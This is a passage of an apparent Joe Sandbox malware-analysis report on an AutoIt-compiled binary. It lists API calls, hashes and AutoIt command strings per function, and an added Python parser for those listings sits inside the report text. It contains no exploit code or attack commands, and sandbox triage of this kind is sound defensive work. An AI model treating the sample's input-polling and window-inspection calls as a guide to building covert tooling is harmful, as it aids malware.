                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: 244c25d81e97d7d31e2d132dfd9eeb75c5a02a4bc7421c80c046ceaf5d99d764
                                                    • Instruction ID: 0d405f5cd1f7c510b798c9e90da78453e41d3ff23cd48791e42beaea8edc1535
                                                    • Opcode Fuzzy Hash: 244c25d81e97d7d31e2d132dfd9eeb75c5a02a4bc7421c80c046ceaf5d99d764
                                                    • Instruction Fuzzy Hash: FDB13D75A0020E9FDB14DFA8DC95BFE77A4FB48314F204219FA15A6290DB74A850DF54
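The "APIs" listing for each function above follows one fixed shape: a bullet, an optional "Part of subcall function ADDR:" prefix for calls made from a callee, then API.MODULE(args), ref: ADDR, with LIBCMT entries carrying no argument list. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin output: it parses that listing from a few lines copied from the block above (a constructed sample), decodes the hexadecimal arguments, separates direct calls from subcall entries, and tallies the names on a small watch list. The watch list and its reasons are this example's own assumption; the only decoding it does of a specific argument is SetTimer's third parameter, which Windows defines as the interval in milliseconds.

```python
import re
from collections import Counter

# Constructed sample: "APIs" lines in the shape the report uses, copied from the
# "AutoIt v3 GUI" function block (the subcall lines carry extra indentation there).
SAMPLE_LISTING = """\
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EF2C8C
• GetSystemMetrics.USER32(00000007), ref: 00EF2C94
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EF2D4C
  • Part of subcall function 00EF2714: GetCursorPos.USER32(?), ref: 00EF2727
  • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000001), ref: 00EF2769
  • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000002), ref: 00EF2777
• SetTimer.USER32(00000000,00000000,00000028,00EF13C7), ref: 00EF2DCC
• _wcscat.LIBCMT ref: 00F54A81
"""

# One report line: optional subcall prefix, API.MODULE, optional (args), ", ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Hypothetical watch list (this example's assumption, not from the report):
# API names a triage script wants to see counted per function, with a short reason.
WATCH = {
    "GetAsyncKeyState": "polls keyboard/mouse button state",
    "GetCursorPos": "reads pointer position",
    "SetTimer": "installs a periodic callback",
}


def parse_arg(token):
    """'?' means the sandbox could not recover the value; 8 hex digits are a DWORD;
    anything else is a string literal such as the window class name."""
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token


def parse_listing(text):
    """Return one dict per recognised API line; unrecognised lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [parse_arg(a) for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),          # call-site address
            "subcall": m.group("subcall"),           # callee address, or None for a direct call
        })
    return records


def flag_records(records):
    """Count how often each watch-listed API appears in the parsed function."""
    return Counter(r["api"] for r in records if r["api"] in WATCH)


def timer_interval_ms(record):
    """For SetTimer(hWnd, nIDEvent, uElapse, lpTimerFunc) return uElapse; None otherwise."""
    if record["api"] != "SetTimer" or len(record["args"]) < 3:
        return None
    return record["args"][2]


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for api, n in flag_records(recs).items():
        print(f"{api}: {n} call(s), {WATCH[api]}")
    for r in recs:
        ms = timer_interval_ms(r)
        if ms is not None:
            print(f"SetTimer at {r['ref']:08X} fires every {ms} ms")
```

The subcall field matters when reading these blocks: the GetAsyncKeyState calls are attributed to function 00EF2714, not to the GUI-creating function itself, so a rule keyed on the direct calls alone would miss them. The 40 ms interval decoded from SetTimer is just the listed argument; the report does not state which routine that timer drives.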
                                                    APIs
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • GetForegroundWindow.USER32(00F80980,?,?,?,?,?), ref: 00F104E3
                                                    • IsWindow.USER32(?), ref: 00F466BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$Foreground_memmove
                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                    • API String ID: 3828923867-1919597938
                                                    • Opcode ID: 58ff781370d2ee06e3771d67709eb9dcf1c8c8f6b6d195c5ade0909ae4adbc7f
                                                    • Instruction ID: 934b3da8c1bc886e7fe18f26c5037a904950581ccfc8181b5073a242676456ea
                                                    • Opcode Fuzzy Hash: 58ff781370d2ee06e3771d67709eb9dcf1c8c8f6b6d195c5ade0909ae4adbc7f
                                                    • Instruction Fuzzy Hash: 03D1D471504202DBCB04EF20C8819EABFB5BF56354F144A19F855872A2DF34F999FB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F744AC
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F7456C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: 84d8957a1452376548fd1cdf3dca10400d891d6ca9ddb42a8bac7f5be6480732
                                                    • Instruction ID: 6be9e919a0488bedda2e05ebb33a928135af881b112d488eca91100cf68ff750
                                                    • Opcode Fuzzy Hash: 84d8957a1452376548fd1cdf3dca10400d891d6ca9ddb42a8bac7f5be6480732
                                                    • Instruction Fuzzy Hash: C4A17C716042059FCB14EF20C851A7AB7E5BF89310F148929F99A9B2D2DF74FC05EB92
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00F656E1
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00F656EC
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F656F7
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00F65702
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00F6570D
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00F65718
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00F65723
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00F6572E
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00F65739
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00F65744
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00F6574F
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00F6575A
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00F65765
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00F65770
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00F6577B
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00F65786
                                                    • GetCursorInfo.USER32(?), ref: 00F65796
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 00F657C1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: e1929cc94165accb5f5e58942d756ed0079e4fcb78c1c69a54989d53f402811d
                                                    • Instruction ID: db2ee52697d0378564ae816ceaefe7350f9aaec1dd72def43a342fe1a364b1e7
                                                    • Opcode Fuzzy Hash: e1929cc94165accb5f5e58942d756ed0079e4fcb78c1c69a54989d53f402811d
                                                    • Instruction Fuzzy Hash: E9415270E04319AADB109FBA8C49D6EFEF8EF51B20F10452FE509E7290DAB8A400DE51
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F4B17B
                                                    • __swprintf.LIBCMT ref: 00F4B21C
                                                    • _wcscmp.LIBCMT ref: 00F4B22F
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F4B284
                                                    • _wcscmp.LIBCMT ref: 00F4B2C0
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F4B2F7
                                                    • GetDlgCtrlID.USER32(?), ref: 00F4B349
                                                    • GetWindowRect.USER32(?,?), ref: 00F4B37F
                                                    • GetParent.USER32(?), ref: 00F4B39D
                                                    • ScreenToClient.USER32(00000000), ref: 00F4B3A4
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F4B41E
                                                    • _wcscmp.LIBCMT ref: 00F4B432
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F4B458
                                                    • _wcscmp.LIBCMT ref: 00F4B46C
                                                      • Part of subcall function 00F1385C: _iswctype.LIBCMT ref: 00F13864
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: 5b88a1be253a586a56650abf25db1eee47607df2ee91b3982361345775bb7a8b
                                                    • Instruction ID: 116198b68c23ecca1a1327f79997f9c8a66203d5609cdcbf6636c9c42bfa2ad2
                                                    • Opcode Fuzzy Hash: 5b88a1be253a586a56650abf25db1eee47607df2ee91b3982361345775bb7a8b
                                                    • Instruction Fuzzy Hash: D7A1F271604306AFD714DF64C884BEABBE8FF48324F104619FD99C21A2DB34E959EB90
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00F4BAB1
                                                    • _wcscmp.LIBCMT ref: 00F4BAC2
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F4BAEA
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F4BB07
                                                    • _wcscmp.LIBCMT ref: 00F4BB25
                                                    • _wcsstr.LIBCMT ref: 00F4BB36
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F4BB6E
                                                    • _wcscmp.LIBCMT ref: 00F4BB7E
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F4BBA5
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F4BBEE
                                                    • _wcscmp.LIBCMT ref: 00F4BBFE
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00F4BC26
                                                    • GetWindowRect.USER32(00000004,?), ref: 00F4BC8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: c0305eea5462012666add0dbb30bbd19a6e9a7a19c90c4e398adc460354a098b
                                                    • Instruction ID: 6e6034daba597b14dedeb3506c31298bb016daef8959c87a69636ebe8bca8daa
                                                    • Opcode Fuzzy Hash: c0305eea5462012666add0dbb30bbd19a6e9a7a19c90c4e398adc460354a098b
                                                    • Instruction Fuzzy Hash: 1681837140820A9BDB14DF14C8C5FAA7BE8FF84324F048569FE899A097DB34DD49EB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 77acab2416c5f812480e6e161c953b439b3c20e659809a483e0fa026f0c9f1b3
                                                    • Instruction ID: 950855e249eb5d1e56f243f409a3dc4d448a8a684f7a26b2fcdbd49db421c665
                                                    • Opcode Fuzzy Hash: 77acab2416c5f812480e6e161c953b439b3c20e659809a483e0fa026f0c9f1b3
                                                    • Instruction Fuzzy Hash: 3731C471A44205A6DB14EB60CD43EFE7BB4AF21760F600129F941B11D2EF59EE08FA53
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 00F4CBAA
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F4CBBC
                                                    • SetWindowTextW.USER32(?,?), ref: 00F4CBD3
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F4CBE8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F4CBEE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F4CBFE
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F4CC04
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F4CC25
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F4CC3F
                                                    • GetWindowRect.USER32(?,?), ref: 00F4CC48
                                                    • SetWindowTextW.USER32(?,?), ref: 00F4CCB3
                                                    • GetDesktopWindow.USER32 ref: 00F4CCB9
                                                    • GetWindowRect.USER32(00000000), ref: 00F4CCC0
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F4CD0C
                                                    • GetClientRect.USER32(?,?), ref: 00F4CD19
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F4CD3E
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F4CD69
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 8bf93dc88e3da8fcf40c9dd3f104511141cc46348d2bc29075d9dc40e2fbfa0e
                                                    • Instruction ID: 3923f8ae788e262ba4161249c4166e0e2845cad8b7d81d5fbec6e058e4134541
                                                    • Opcode Fuzzy Hash: 8bf93dc88e3da8fcf40c9dd3f104511141cc46348d2bc29075d9dc40e2fbfa0e
                                                    • Instruction Fuzzy Hash: 32518F31900709EFDB60DFA8CE89BAEBBF5FF44705F004518E646A25A0DB74A914EF50
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F7A87E
                                                    • DestroyWindow.USER32(00000000,?), ref: 00F7A8F8
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F7A972
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F7A994
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F7A9A7
                                                    • DestroyWindow.USER32(00000000), ref: 00F7A9C9
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EF0000,00000000), ref: 00F7AA00
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F7AA19
                                                    • GetDesktopWindow.USER32 ref: 00F7AA32
                                                    • GetWindowRect.USER32(00000000), ref: 00F7AA39
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F7AA51
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F7AA69
                                                      • Part of subcall function 00EF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00EF29BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 2dd8aee696d102e85698c8bb35b5f29ab3f5da2c41da18bafdba922ec100c19a
                                                    • Instruction ID: e02aee24be4875e958c92c4917d8df4f9a73b849665d02703846a77c3b04e087
                                                    • Opcode Fuzzy Hash: 2dd8aee696d102e85698c8bb35b5f29ab3f5da2c41da18bafdba922ec100c19a
                                                    • Instruction Fuzzy Hash: 6E71AB71540204AFE721DF28CC48FAA77E5EBC8310F55861EF989872A0DB34E915EB52
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DragQueryPoint.SHELL32(?,?), ref: 00F7CCCF
                                                      • Part of subcall function 00F7B1A9: ClientToScreen.USER32(?,?), ref: 00F7B1D2
                                                      • Part of subcall function 00F7B1A9: GetWindowRect.USER32(?,?), ref: 00F7B248
                                                      • Part of subcall function 00F7B1A9: PtInRect.USER32(?,?,00F7C6BC), ref: 00F7B258
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F7CD38
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F7CD43
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F7CD66
                                                    • _wcscat.LIBCMT ref: 00F7CD96
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F7CDAD
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F7CDC6
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F7CDDD
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F7CDFF
                                                    • DragFinish.SHELL32(?), ref: 00F7CE06
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F7CEF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: c64e913b4d5fad3983e2bf023c211997abdc4a1f96e35c97ea086d2baa52d505
                                                    • Instruction ID: 0772558ae5f9c1d2824cd51ba230cd3bc74eb56680d66b5356ebfc2c78e0c6f8
                                                    • Opcode Fuzzy Hash: c64e913b4d5fad3983e2bf023c211997abdc4a1f96e35c97ea086d2baa52d505
                                                    • Instruction Fuzzy Hash: C7617A71508304AFC711EF60DC85DABBBE8FFC9350F004A1EF695921A1DB709A09EB92
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 00F5831A
                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 00F58323
                                                    • VariantClear.OLEAUT32(00000000), ref: 00F5832F
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F5841D
                                                    • __swprintf.LIBCMT ref: 00F5844D
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00F58479
                                                    • VariantInit.OLEAUT32(?), ref: 00F5852A
                                                    • SysFreeString.OLEAUT32(?), ref: 00F585BE
                                                    • VariantClear.OLEAUT32(?), ref: 00F58618
                                                    • VariantClear.OLEAUT32(?), ref: 00F58627
                                                    • VariantInit.OLEAUT32(00000000), ref: 00F58665
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: cadac8eaca90b2fe5d30c537e971c0c13e232d22d1e23720beb0dd781fe70864
                                                    • Instruction ID: 7dc9d39b17e3eb1352c5c185f4099463948b545c13691f9bdab619522ceefcef
                                                    • Opcode Fuzzy Hash: cadac8eaca90b2fe5d30c537e971c0c13e232d22d1e23720beb0dd781fe70864
                                                    • Instruction Fuzzy Hash: E8D1DF72A04519DBDB109F61C885BAEB7B4BF04792F148155EA05FB290DF34EC4AFB90
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F74A61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F74AAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 45d7a976ad3541510216cae60b6d03c13410e2b0d56a995328aac82b3fe8683f
                                                    • Instruction ID: 9cefa641287b0eb0b46cfd94622d4cdb4f8f4f697f0e1d998170f75c9330e25f
                                                    • Opcode Fuzzy Hash: 45d7a976ad3541510216cae60b6d03c13410e2b0d56a995328aac82b3fe8683f
